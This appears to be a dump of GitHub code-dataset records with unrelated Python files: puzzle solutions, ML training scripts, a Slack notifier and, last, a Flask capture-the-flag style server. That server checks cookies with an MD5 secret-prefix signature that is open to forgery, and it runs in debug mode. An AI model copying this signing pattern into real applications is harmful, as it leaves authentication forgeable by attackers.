doi[nPoints] = line[doiIndex]\n\n                nPoints += 1\n                first = False\n                line = fio.getRealNumbersfromLine(f.readline())\n\n            # Assign the half space depth\n            depthEdges[-1] = 1.5 * depthEdges[-2]\n\n\n        self.mesh = TopoRectilinearMesh2D(x_centres=x[:nPoints], y_centres=y[:nPoints], z_edges=depthEdges, heightCentres=z[:nPoints])\n        self.fid = StatArray(fid[:nPoints], 'Fiducial')\n        self.rho = StatArray(rho[:, :nPoints], 'Resistivity', '$\\Omega m$')\n        self.doi = StatArray(doi[:nPoints], 'Depth of investigation', 'm')\n\n\n\n    def read3D(self, fileName):\n\n        raise NotImplementedError('yet')","repo_name":"DOI-USGS/geobipy","sub_path":"geobipy/src/classes/model/AarhusModel.py","file_name":"AarhusModel.py","file_ext":"py","file_size_in_byte":6419,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"}
{"seq_id":"18771665943","text":"# passes with PyPy; times out with Python 3\n\nimport sys\nfrom collections import deque\n\ninput = sys.stdin.readline\n\n\ndef air_cleaner() :\n    global R,C,cleaner\n    \n    x = cleaner # x coordinate of the top half of the air cleaner\n    \n    graph[x][0] = 0\n    graph[x+1][0] = 0 \n    \n    # blow the wind counter-clockwise\n    # downward\n    for i in range(x,0,-1) :\n        graph[i][0] = graph[i-1][0]\n\n    # leftward\n    for j in range(0,C-1) :\n        graph[0][j] = graph[0][j+1]\n    \n    # upward\n    for i in range(0,x) :\n        graph[i][C-1] = graph[i+1][C-1]\n\n    # rightward\n    for j in range(C-1,1,-1) :\n        graph[x][j] = graph[x][j-1]\n    graph[x][1] = 0\n\n    # blow the wind clockwise\n    x = x + 1 # move to the bottom half of the air cleaner\n\n    # upward\n    for i in range(x,R-1) : \n        graph[i][0] = graph[i+1][0]\n\n    # leftward\n    for j in range(0,C-1) :\n        graph[R-1][j] = graph[R-1][j+1]\n\n    # downward\n    for i in range(R-1,x,-1) :\n        graph[i][C-1] = graph[i-1][C-1]\n\n    # rightward\n    for j in range(C-1,1,-1) :\n        graph[x][j] = graph[x][j-1]\n    graph[x][1] = 0\n\n    clean = graph[x][0] + graph[x-1][0]\n    graph[x][0],graph[x-1][0] = -1,-1\n\n    return clean\n\n\n\nR,C,T = map(int,input().split())\ngraph = [list(map(int,input().split())) for _ in range(R)]\ncleaner = 0\nfor r in range(R) :\n    if graph[r][0] == -1 :\n        cleaner = r # store the x coordinate of the air cleaner\n        break\n\nt = 0 # elapsed time\n\ndx = [0,-1,0,1]\ndy = [1,0,-1,0]\n\nwhile True : \n    # 1. fine dust diffusion\n
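    # (hedged worked example, editorial: a cell holding 14 dust spreads\n    # 14 // 5 = 2 to each in-bounds neighbour that is not the cleaner; with\n    # 3 such neighbours it keeps 14 - 3*2 = 8 and each neighbour gains 2)\n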
    tmp = [[0] * C for _ in range(R)] # diffused fine-dust amounts\n    for x in range(R) :\n        for y in range(C) :\n            if graph[x][y] < 5 :\n                tmp[x][y] += graph[x][y] # too little dust (or the cleaner) - nothing spreads\n                continue\n            \n            spread = graph[x][y] // 5\n            cnt = 0 # number of positions the dust spread to\n\n            for i in range(4) :\n                nx = x + dx[i]\n                ny = y + dy[i]\n                if 0<=nx<R and 0<=ny<C and graph[nx][ny] != -1 :\n                    tmp[nx][ny] += spread\n                    cnt += 1\n            tmp[x][y] += graph[x][y] - (spread*cnt)\n\n    for r in range(R) :\n        graph[r] = tmp[r]\n\n    # 2. run the air cleaner\n    air_cleaner()\n\n    t += 1\n\n    # total fine dust that remains (the two cleaner cells hold -1)\n    remain = 2\n    for r in range(R) :\n        for c in range(C) :\n            remain += graph[r][c]\n\n    if t >= T :\n        break\n\nprint(remain)","repo_name":"hk-bae/coding-test","sub_path":"study/week3/boj_17144.py","file_name":"boj_17144.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"16592303298","text":"# Opens a file named 'input_file_name.txt' in read mode.\r\n# The 'with' statement ensures that the file is properly closed after it is used.\r\nwith open('input_file_name.txt', 'r') as file:\r\n    \r\n    # Reads all the lines in the file and stores them in a list named 'values'.\r\n    # Each line in the file becomes an element in the list.\r\n    values = file.readlines()\r\n\r\n# Creates a new list named 'updated_values' that contains modified versions of the strings in the 'values' list.\r\n# Each string is wrapped in single quotes and followed by a comma and a newline character.\r\nupdated_values = [f\"'{value.strip()}',\\n\" for value in values]\r\n\r\n# Opens a file named 'updated_file_name.txt' in write mode.\r\n# The 'with' statement ensures that the file is properly closed after it is used.\r\nwith open('updated_file_name.txt', 'w') as file:\r\n    \r\n    # Writes the contents of the 'updated_values' list to the file.\r\n    # Each element in the list is written as a separate line.\r\n    file.writelines(updated_values)\r\n
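\r\n# Worked example (editorial note, not in the original): an input line that\r\n# reads abc comes out as 'abc', plus a newline, ready to paste into a list.\r\n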
","repo_name":"jsolejr/useful-utilities","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"1706451308","text":"import os\nimport cv2\n\ninput_dir = r\"/home/u2004/Desktop/AI_Image_Classification/opencv_create_sample/input_neg\"\nbg_out_path = r\"/home/u2004/Desktop/AI_Image_Classification/opencv_create_sample/output/neg\"\nbg_file_path = r\"/home/u2004/Desktop/AI_Image_Classification/opencv_create_sample/output/bg.txt\"\nbg_counter_file_path = r\"/home/u2004/Desktop/AI_Image_Classification/opencv_create_sample/output/bg_counter.txt\"\n\ndef update_bg(cnt):\n    with open(bg_file_path, 'a') as counterFile:\n        counterFile.write(str(cnt))\n\ndef update_counter(cnt):\n    with open(bg_counter_file_path, 'w') as counterFile:\n        counterFile.write(str(cnt))\n\ndef read_counter():\n    try:\n        with open(bg_counter_file_path, 'r') as counterFile:\n            return int(counterFile.read())\n    except Exception as error:\n        print(error)\n        return 0\n\ncounter = read_counter()\nfor root, dirs, files in os.walk(input_dir, topdown=False):\n    for name in files:\n        dir_ = os.path.join(root, name)\n        update_bg(\"neg/\" + str(counter) + \".jpg\" + \"\\n\")\n        img = cv2.imread(dir_)\n        cv2.imwrite(bg_out_path + \"/\" + str(counter) + \".jpg\", img)\n        counter += 1\n        update_counter(counter)\n","repo_name":"namnguyendsn/ImageProcessing","sub_path":"opencv_create_sample/output/write_bg.py","file_name":"write_bg.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"23172204766","text":"import os\nimport time\nimport torch\nimport argparse\nimport numpy as np\nfrom inference import infer\nfrom utils.util import mode\nfrom hparams import hparams as hps\nfrom torch.utils.data import DataLoader\nfrom utils.logger import Tacotron2Logger\nfrom utils.dataset import ljdataset, ljcollate\nfrom model.model import Tacotron2, Tacotron2Loss\nfrom numpy import finfo\nimport math,random\nfrom inference import *\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '0'\nnp.random.seed(hps.seed)\ntorch.manual_seed(hps.seed)\ntorch.cuda.manual_seed(hps.seed)\n\ndef prepare_dataloaders(fdir):\n\ttrainset = ljdataset(fdir)\n\tcollate_fn = ljcollate(hps.n_frames_per_step)\n\ttrain_loader = DataLoader(trainset, num_workers = hps.n_workers, shuffle = True,\n\t\t\t\t\t\t\t  batch_size = hps.batch_size, pin_memory = hps.pin_mem,\n\t\t\t\t\t\t\t  drop_last = True, collate_fn = collate_fn)\n\treturn train_loader\n\n\ndef load_checkpoint(ckpt_pth, model, optimizer):\n\tckpt_dict = torch.load(ckpt_pth)\n\tmodel.load_state_dict(ckpt_dict['model'])\n\toptimizer.load_state_dict(ckpt_dict['optimizer'])\n\titeration = ckpt_dict['iteration']\n\treturn model, optimizer, iteration\n\n\ndef save_checkpoint(model, optimizer, iteration, ckpt_pth):\n\ttorch.save({'model': model.state_dict(),\n\t\t\t\t'optimizer': optimizer.state_dict(),\n\t\t\t\t'iteration': iteration}, ckpt_pth)\n\ndef plot_data(data, figsize = (16, 4)):\n\tfig, axes = plt.subplots(1, len(data), figsize = figsize)\n\tfor i in range(len(data)):\n\t\taxes[i].imshow(data[i], aspect = 'auto', origin = 'lower')\n\ndef plot(output, pth):\n\tmel_outputs, mel_outputs_postnet, alignments = output\n\tplot_data((to_arr(mel_outputs[0]),\n\t\t\t\tto_arr(mel_outputs_postnet[0]),\n\t\t\t\tto_arr(alignments[0]).T))\n\tplt.savefig(pth+'.png')\n\n\ndef audio(output, pth):\n\tmel_outputs, mel_outputs_postnet, _ = output\n\twav_postnet = inv_melspectrogram(to_arr(mel_outputs_postnet[0]))\n\tsave_wav(wav_postnet, pth+'.wav')\n\n\ndef save_mel(output, pth):\n\tmel_outputs, mel_outputs_postnet, _ = output\n\tnp.save(pth+'.npy', to_arr(mel_outputs_postnet[0]).T)\n\ndef warm_start_model(checkpoint_path, model, ignore_layers, optimizer):\n\tassert os.path.isfile(checkpoint_path)\n\tprint(\"Warm starting model from checkpoint '{}'\".format(checkpoint_path))\n\tcheckpoint_dict = torch.load(checkpoint_path, map_location='cpu')\n\tmodel_dict = checkpoint_dict['model']\n\tif len(ignore_layers) > 0:\n\t\tmodel_dict = {k: v for k, v in model_dict.items()\n\t\t\t\t\t  if k not in ignore_layers}\n\t\tdummy_dict = model.state_dict()\n\t\tdummy_dict.update(model_dict)\n\t\tmodel_dict = dummy_dict\n\tmodel.load_state_dict(model_dict)\n\toptimizer.load_state_dict(checkpoint_dict['optimizer'])\n\treturn model\n\n\ndef train(args):\n\t# build model\n\tmodel = Tacotron2()\n\tmode(model, True)\n\tif hps.fp16_run:\n\t\tmodel.decoder.attention_layer.score_mask_value = 
finfo('float16').min\n\n\toptimizer = torch.optim.Adam(model.parameters(), lr = hps.lr,\n\t\t\t\t\t\t\t\tbetas = hps.betas, eps = hps.eps,\n\t\t\t\t\t\t\t\tweight_decay = hps.weight_decay)\n\n\tif hps.fp16_run:\n\t\tfrom apex import amp\n\t\tmodel, optimizer = amp.initialize(model, optimizer, opt_level='O2')\n\n\tcriterion = Tacotron2Loss()\n\t\n\t# load checkpoint\n\titeration = 1\n\tif args.ckpt_pth != '':\n\t\tif hps.warm_start:\n\t\t\tmodel = warm_start_model(args.ckpt_pth, model, hps.ignore_layers,optimizer)\n\t\t\titeration += 1\n\t\telse:\n\t\t\tmodel, optimizer, iteration = load_checkpoint(args.ckpt_pth, model, optimizer)\n\t\t\tprint('load from :', args.ckpt_pth)\n\t\t\titeration += 1 # next iteration is iteration+1\n\t\t\t# iteration = 1\n\t\n\t# get scheduler\n\tif hps.sch:\n\t\tlr_lambda = lambda step: hps.sch_step**0.5*min((step+1)*hps.sch_step**-1.5, (step+1)**-0.5)\n\t\tif args.ckpt_pth != '':\n\t\t\tscheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda, last_epoch = iteration)\n\t\telse:\n\t\t\tscheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda)\n\t\n\t# make dataset\n\ttrain_loader = prepare_dataloaders(args.data_dir)\n\t\n\t# get logger ready\n\tif args.log_dir != '':\n\t\tif not os.path.isdir(args.log_dir):\n\t\t\tos.makedirs(args.log_dir)\n\t\t\tos.chmod(args.log_dir, 0o775)\n\t\tlogger = Tacotron2Logger(args.log_dir)\n\n\t# get ckpt_dir ready\n\tif args.ckpt_dir != '' and not os.path.isdir(args.ckpt_dir):\n\t\tos.makedirs(args.ckpt_dir)\n\t\tos.chmod(args.ckpt_dir, 0o775)\n\t\n\tmodel.train()\n\t# ================ MAIN TRAINNIG LOOP! ===================\n\twhile iteration <= hps.max_iter:\n\t\tfor batch in train_loader:\n\t\t\tif iteration > hps.max_iter:\n\t\t\t\tbreak\n\t\t\tstart = time.perf_counter()\n\t\t\tx, y = model.parse_batch(batch)\n\t\t\ty_pred = model(x)\n\n\t\t\t# loss\n\t\t\tloss, item = criterion(y_pred, y, iteration)\n\n\t\t\t# zero grad\n\t\t\tmodel.zero_grad()\n\n\t\t\tif hps.fp16_run:\n\t\t\t\twith amp.scale_loss(loss, optimizer) as scaled_loss:\n\t\t\t\t\tscaled_loss.backward()\n\t\t\telse:\n\t\t\t\tloss.backward()\n\n\t\t\tif hps.fp16_run:\n\t\t\t\tgrad_norm = torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), hps.grad_clip_thresh)\n\t\t\t\tis_overflow = math.isnan(grad_norm)\n\t\t\telse:\n\t\t\t\tgrad_norm = torch.nn.utils.clip_grad_norm_(model.parameters(), hps.grad_clip_thresh)\n\t\t\t\n\t\t\t# backward, grad_norm, and update\n\t\t\t# loss.backward()\n\t\t\t# grad_norm = torch.nn.utils.clip_grad_norm_(model.parameters(), hps.grad_clip_thresh)\n\n\t\t\toptimizer.step()\n\t\t\tif hps.sch:\n\t\t\t\tscheduler.step()\n\t\t\t\n\t\t\t# info\n\t\t\tdur = time.perf_counter()-start\n\t\t\tif(iteration % 10 == 0):\n\t\t\t\tprint('Iter: {} Loss: {:.6f} Grad Norm: {:.6f} {:.2f}s/it'.format(\n\t\t\t\t\titeration, item, grad_norm, dur))\n\t\t\t\n\t\t\t# log\n\t\t\tif args.log_dir != '' and (iteration % hps.iters_per_log == 0):\n\t\t\t\tlearning_rate = optimizer.param_groups[0]['lr']\n\t\t\t\tlogger.log_training(item, grad_norm, learning_rate, iteration)\n\t\t\t\n\t\t\t# sample\n\t\t\t# iteration = 0\n\t\t\tif args.log_dir != '' and (iteration % hps.iters_per_sample == 0):\n\t\t\t\tmodel.eval()\n\t\t\t\ti = random.randint(0, len(hps.eg_text) - 1)\n\t\t\t\ttext = hps.eg_text[i]\n\t\t\t\tprint('text:', text)\n\t\t\t\toutput = infer(text, model)\n\t\t\t\tmodel.train()\n\t\t\t\tlogger.sample_training(output, iteration)\n\n\t\t\t\tplot(output, os.path.join(args.ckpt_dir,str(iteration)))\n\t\t\t\taudio(output, 
os.path.join(args.ckpt_dir,str(iteration)))\n\t\t\t\tsave_mel(output, os.path.join(args.ckpt_dir,str(iteration)))\n\t\t\t\n\t\t\t# save ckpt\n\t\t\tif args.ckpt_dir != '' and (iteration % hps.iters_per_ckpt == 0):\n\t\t\t\tckpt_pth = os.path.join(args.ckpt_dir, 'biaobei_{}.pt'.format(iteration))\n\t\t\t\tprint('hps.n_frames_per_step:',hps.n_frames_per_step)\n\t\t\t\tprint('ckpt_pth:',ckpt_pth)\n\t\t\t\tsave_checkpoint(model, optimizer, iteration, ckpt_pth)\n\n\t\t\titeration += 1\n\tif args.log_dir != '':\n\t\tlogger.close()\n\tprint('train done')\n\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser()\n\n\tdata_dir = './tacotron2/biaobei/training/'\n\tprint('data_dir:',data_dir)\n\tparser.add_argument('--data_dir', type = str, default = data_dir,help = 'directory to load data')\n\tparser.add_argument('--log_dir', type = str, default = './biaobei3/log',help = 'directory to save tensorboard logs')\n\tparser.add_argument('--ckpt_dir', type = str, default = './biaobei3/ckpt',help = 'directory to save checkpoints')\n\tparser.add_argument('--ckpt_pth', type = str, default = '',help = 'path to load checkpoints')\n\n\targs = parser.parse_args()\n\tprint(\"FP16 Run:\", hps.fp16_run)\n\tprint(\"hps.n_symbols:\", hps.n_symbols)\n\tprint('hps.n_frames_per_step:',hps.n_frames_per_step)\n\ttorch.backends.cudnn.enabled = True\n\ttorch.backends.cudnn.benchmark = False # disabled because input shapes are dynamic\n\ttrain(args)\n","repo_name":"wqt2019/tacotron-2_wavernn","sub_path":"train_tacotron2.py","file_name":"train_tacotron2.py","file_ext":"py","file_size_in_byte":7265,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"53"}
{"seq_id":"16270808018","text":"import os\r\nimport numpy as np\r\nimport torch\r\nfrom PIL import Image\r\nfrom torch.utils.data import Dataset, WeightedRandomSampler\r\n# import albumentations as A\r\n# from albumentations.pytorch.transforms import ToTensorV2\r\n\r\nclass RealPastedGlasses(Dataset):\r\n    def __init__(self, real_root, pasted_root, transform = None):\r\n        self.real_root = real_root\r\n        self.pasted_root = pasted_root\r\n\r\n        self.real = os.listdir(real_root)\r\n        self.pasted = os.listdir(pasted_root)\r\n        self.len_real = len(self.real)\r\n        self.len_pasted = len(self.pasted)\r\n        self.transform = transform\r\n\r\n    def __len__(self):\r\n        return self.len_real + self.len_pasted\r\n\r\n    def __getitem__(self, i):\r\n        if i < self.len_real:\r\n            img = np.array(Image.open(os.path.join(self.real_root, self.real[i])))\r\n            mask = np.ones((img.shape[0], img.shape[1]))\r\n            cls = torch.FloatTensor([1, 0])\r\n        else:\r\n            img = np.array(Image.open(os.path.join(self.pasted_root, self.pasted[i - self.len_real])))\r\n            mask = np.mean(img[:,144:,:],axis=2)\r\n            img = img[:,:144,:]\r\n            cls = torch.FloatTensor([0, 1])\r\n\r\n        mask[mask == 255.0] = 1.0\r\n        album = self.transform(image=img, mask=mask)\r\n        return album[\"image\"], album[\"mask\"].unsqueeze(0), cls\r\n\r\nclass RealGlasses(Dataset):\r\n    def __init__(self, real_root, transform):\r\n        self.root = real_root\r\n        self.real = os.listdir(real_root)\r\n        self.transform = transform\r\n\r\n    def __len__(self):\r\n        return len(self.real)\r\n\r\n    def __getitem__(self, i):\r\n        img = np.array(Image.open(os.path.join(self.root, self.real[i])))\r\n        album = self.transform(image=img)\r\n        target_cls = torch.FloatTensor([0, 1])\r\n        # target_cls = torch.FloatTensor([1, 0])\r\n        return album[\"image\"], target_cls\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    from torch.utils.data import DataLoader\r\n    from 
utils import *\r\n    from torch.utils.data import WeightedRandomSampler\r\n    class_weight = [1 / len(os.listdir(\"E:/finalyrs_project/real_imgs\")), 1 / len(os.listdir(\"E:/finalyrs_project/DatasetAugmentation/pasted\"))]\r\n    dataset = RealPastedGlasses(\"E:/finalyrs_project/real_imgs\",\"E:/finalyrs_project/DatasetAugmentation/pasted\", transform=transform)\r\n    real_weight = [1 / len(os.listdir(\"E:/finalyrs_project/real_imgs\"))] *len(os.listdir(\"E:/finalyrs_project/real_imgs\"))\r\n    fake_weight = [1 / len(os.listdir(\"E:/finalyrs_project/DatasetAugmentation/pasted\"))] *len(os.listdir(\"E:/finalyrs_project/DatasetAugmentation/pasted\"))\r\n    sample_weight = real_weight + fake_weight\r\n    sampler = WeightedRandomSampler(sample_weight, num_samples=len(sample_weight), replacement=True)\r\n    loader = DataLoader(dataset, batch_size=8, pin_memory=True, drop_last=True, sampler=sampler)\r\n\r\n    for idx, (image,mask, cls) in enumerate(loader):\r\n        print(image.shape,mask.shape, torch.abs(cls - 1))\r\n\r\n","repo_name":"Deepdive543443/StarWarp-Lens-distortion-correction-base-on-StarGAN","sub_path":"Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"25616440883","text":"# import packages and functions\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import datasets\r\nfrom matplotlib.colors import ListedColormap\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\n# load the data\r\niris = datasets.load_iris()\r\nX = pd.DataFrame(iris.data, columns = iris.feature_names)\r\ny = pd.DataFrame(iris.target, columns = ['target'])\r\niris = pd.concat([X, y], axis = 1)\r\nprint(iris)\r\n\r\n# extract the data used for the logistic regression\r\niris = iris[['sepal length (cm)', 'petal length (cm)', 'target']]\r\niris = iris[iris['target'].isin([0, 1])]\r\nprint(iris)\r\n\r\n# prepare the training and test sets for machine learning\r\nX = iris[['sepal length (cm)', 'petal length (cm)']]\r\ny = iris[['target']]\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state = 0)\r\nprint(\"dimensions of the training set:\", X_train.shape)\r\nprint(\"dimensions of the test set:\", X_test.shape)\r\n\r\n# standardize the data (mean 0, standard deviation 1); fit the scaler on the\r\n# training set only and reuse it on the test set\r\nscaler = StandardScaler().fit(X_train)\r\nX_train_std = scaler.transform(X_train)\r\nX_test_std = scaler.transform(X_test)\r\n\r\n# build and train the logistic regression model\r\nmodel = LogisticRegression()\r\nmodel.fit(X_train_std, y_train['target'])\r\n
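\r\n# Hedged editorial sketch (not in the original script): inspect per-class\r\n# probabilities for a few standardized test points; the [:5] slice is\r\n# illustrative only.\r\nprint('class probabilities:', model.predict_proba(X_test_std[:5]))\r\n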
\r\n# predicted classification results\r\ny_pred = model.predict(X_test_std)\r\nprint('targets:', y_test['target'].values)\r\nprint('predictions:', y_pred)\r\nprint('accuracy:', model.score(X_test_std, y_test))\r\n\r\nX = X_test_std\r\ny = y_test['target'].values\r\nmarkers = ('o', '^')\r\ncolors = ('red', 'green')\r\ncmap = ListedColormap(colors[:len(np.unique(y))])\r\nx0min, x0max = X[:, 0].min() - 1, X[:, 0].max() + 1\r\nx1min, x1max = X[:, 1].min() - 1, X[:, 1].max() + 1\r\na, b = np.meshgrid(np.arange(x0min, x0max, 0.01), np.arange(x1min, x1max, 0.01)) \r\nZ = model.predict(np.array([a.ravel(), b.ravel()]).T) \r\nZ = Z.reshape(a.shape)\r\nplt.figure(figsize = (9, 6))\r\nplt.contourf(a, b, Z, alpha = 0.3, cmap = cmap)\r\nplt.xlim(a.min(), a.max())\r\nplt.ylim(b.min(), b.max())\r\nfor i, t in enumerate(np.unique(y)): \r\n    p = X[y == t]\r\n    plt.scatter(x = p[:, 0], y = p[:, 1], c = cmap(i), marker = markers[i], label = t)\r\nplt.xlabel('sepal length [standardized]', size = 20)\r\nplt.ylabel('petal length [standardized]', size = 20)\r\nplt.legend(loc='upper left')\r\nplt.show()","repo_name":"MyDearGreatTeacher/python2022","sub_path":"教科書/Ch16/logic2.py","file_name":"logic2.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
{"seq_id":"72468787048","text":"# The knows API is already defined for you.\n# return a bool, whether a knows b\n# def knows(a: int, b: int) -> bool:\n\nclass Solution:\n    def findCelebrity(self, n: int) -> int:\n\n        celebrity = 0\n        for p in range(n):\n\n            if knows(celebrity, p):\n                celebrity = p\n        # Corner case. don't forget to add this part.\n        for i in range(celebrity):\n            if knows(celebrity, i):\n                return -1\n\n        for p in range(n):\n            if not knows(p, celebrity):\n                return -1\n        return celebrity\n","repo_name":"tech-learner123/leetcode_python","sub_path":"277-medium.py","file_name":"277-medium.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"29966719685","text":"#!/usr/bin/env python\n\n# notify-by-label (c) by Lee Webb (nullify005 at gmail dot com)\n#\n# notify-by-label is licensed under a\n# Creative Commons Attribution-ShareAlike 4.0 International License.\n#\n# You should have received a copy of the license along with this\n# work. If not, see <http://creativecommons.org/licenses/by-sa/4.0/>.\n\nfrom github import Github\nfrom slacker import Slacker\nimport argparse\nimport sys\nimport logging\nfrom urllib import quote\n\ndef get_gh_labels():\n    g = Github(args.ghtoken)\n    org = g.get_organization(args.ghorg)\n    repo = org.get_repo(args.ghrepo)\n    return repo.get_labels()\n\ndef get_pr_strs_for_label(label):\n    ret = []\n    g = Github(args.ghtoken)\n    org = g.get_organization(args.ghorg)\n    repo = org.get_repo(args.ghrepo)\n    issues = g.search_issues('repo:%s/%s is:pr state:open label:\"%s\"' % (args.ghorg,args.ghrepo,label))\n    if issues.totalCount == 0:\n        return []\n    for issue in issues:\n        ipr = issue.pull_request\n        pr_id = int(ipr.html_url.split('/')[-1])\n        pr = repo.get_pull(pr_id)\n        user = pr.user\n        ret.append('<%s|%s> by %s @ %s' % (pr.html_url,pr.title,user.name,pr.created_at))\n    return ret\n\ndef label_is_interesting(name):\n    if not args.labels:\n        return True\n    labels = args.labels.split(',')\n    for l in labels:\n        if l in name:\n            return True\n    return False\n\n## setup the logger\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger(__name__)\nlogging.info('starting')\n\n## arg parser\nparser = argparse.ArgumentParser(description='Scan all open Pull Requests and notify into Slack if there are reviews outstanding')\nparser.add_argument('--ghtoken', dest='ghtoken', required=True, action='store', help='Github API Token')\nparser.add_argument('--ghorg', dest='ghorg', default='Studiosity', action='store', help='Github Organisation')\nparser.add_argument('--ghrepo', dest='ghrepo', default='eureka', action='store', help='Github Repository')\nparser.add_argument('--stoken', dest='stoken', required=True, action='store', help='Slack API Token')\nparser.add_argument('--schannel', dest='schannel', default='#general', action='store', help='Slack Channel')\nparser.add_argument('--suser', dest='suser', default='prcalltoaction', action='store', help='Slack User')\nparser.add_argument('--semoji', dest='semoji', default=':warning:', action='store', help='Slack Emoji Icon')\nparser.add_argument('--verbose', dest='verbose', action='store_true', help='Increase Logging 
Verbosity')\nparser.add_argument('--labels', dest='labels', default=False, action='store', help='The labels to report on, comma separated')\nargs = parser.parse_args()\n\n## setup the logger\nif args.verbose:\n    logging.getLogger().setLevel(logging.DEBUG)\n\n## main\nlogging.info('Searching %s/%s for Pull Requests by Label' % (args.ghorg,args.ghrepo))\nlabels = get_gh_labels()\nattachments = []\nfor label in labels:\n    if not label_is_interesting(label.name):\n        logging.info('Ignoring label %s' % (label.name))\n        continue\n    issues = get_pr_strs_for_label(label.name)\n    logging.info('There are %d issues for label: %s' % (len(issues),label.name))\n    if issues:\n        search = 'repo:%s/%s is:pr state:open label:\"%s\"' % (args.ghorg,args.ghrepo,label.name)\n        attachment = {\n            'title': label.name,\n            'title_link': 'https://github.com/search?q=%s' % (quote(search)),\n            'color': '#%s' % (label.color),\n            'text': '\\n'.join(issues),\n            'mrkdwn_in': ['text', 'pretext']\n        }\n        logging.debug('Appending: %s to attachments for label: %s' % (attachment,label.name))\n        attachments.append(attachment)\nif not attachments:\n    logging.warning('nothing to do? chips')\n    sys.exit(0)\nlogging.info('Sending slack message to channel: %s' % (args.schannel))\nslack = Slacker(args.stoken)\nslack.chat.post_message(\n    args.schannel,\n    text='Outstanding Pull Requests for Project <https://github.com/%s/%s|%s>' % (args.ghorg,args.ghrepo,args.ghrepo),\n    parse=True,\n    attachments=attachments,\n    icon_emoji=args.semoji,\n    username=args.suser\n)\n","repo_name":"nullify005/github-utilities","sub_path":"notify-by-label.py","file_name":"notify-by-label.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"70052383848","text":"'''\nCreated on Mar 20, 2019\n\n@author: sherl\n'''\n\nfrom flask import Flask\nfrom urllib.parse import *\nimport hashlib\nfrom flask import request,make_response,redirect,url_for\n\nSECRET=b'asdfdfg'\n\n\n\napp=Flask(__name__) # create a Flask instance\n\n@app.route('/') # routing: maps the view to a URL; 1. decorator=app.route() 2. decorator(first_flask)\ndef hello(): # view function\n    return 'Hello World' # response\n\n@app.route('/sdf') # routing: maps the view to a URL; 1. decorator=app.route() 2. decorator(first_flask)\ndef hello2(): # view function\n    return 'error' # response\n\n@app.route(\"/admin\", methods=[\"GET\"]) \ndef admin_page(): \n    tep = request.cookies.get(\"auth\")\n    sig = request.cookies.get(\"sig\")\n    # check for missing cookies before unquoting; unquote_to_bytes(None) would raise\n    if tep is None or sig is None: \n        print('one is none')\n        return redirect(url_for(\"hello\")) \n\n    print ('get auth len',len(tep), tep)\n    auth_cookie = unquote_to_bytes(tep) \n    sig_cookie = unquote_to_bytes(sig) \n    \n    print (len(auth_cookie),auth_cookie)\n    print (len(sig_cookie), sig_cookie)\n    \n    if sig_cookie != make_signature(auth_cookie): \n        print ('not match:',sig_cookie ,make_signature(auth_cookie))\n        resp = make_response(redirect(url_for(\"hello2\"))) \n        resp.delete_cookie(\"auth\") \n        resp.delete_cookie(\"sig\") \n        return resp \n    \n    print('passed')\n    cookie_params = {} \n    for p in auth_cookie.split(b\"&\"): \n        print (p)\n        key, val = p.split(b\"=\") \n        cookie_params[key] = val\n    \n    if cookie_params.get(b\"role\") == b\"admin\": \n        return 'FLAG_VALUE' \n    else: \n        return redirect(url_for(\"hello\")) \n    \ndef make_signature(value): \n    temp = SECRET + value \n    print ('make sig:',len(temp), temp)\n    temp=hashlib.md5(temp).hexdigest().encode()\n    print (temp)\n    return temp\n
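\n\n# Hedged editorial sketch (hypothetical helper, not in the original challenge\n# file): build a matching cookie pair the same way the server validates it;\n# quote() mirrors the unquote_to_bytes() calls in admin_page.\ndef make_cookie_pair(value):\n    # value is bytes, e.g. b'username=test&role=user'\n    return quote(value), quote(make_signature(value))\n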
\n\nif __name__ == '__main__':\n    make_signature(b'username=test&role=user')\n    app.run('127.0.0.1', 8012, True) # start the socket\n","repo_name":"functionxu123/someproblem","sub_path":"problems/lanctf/fake_flask.py","file_name":"fake_flask.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
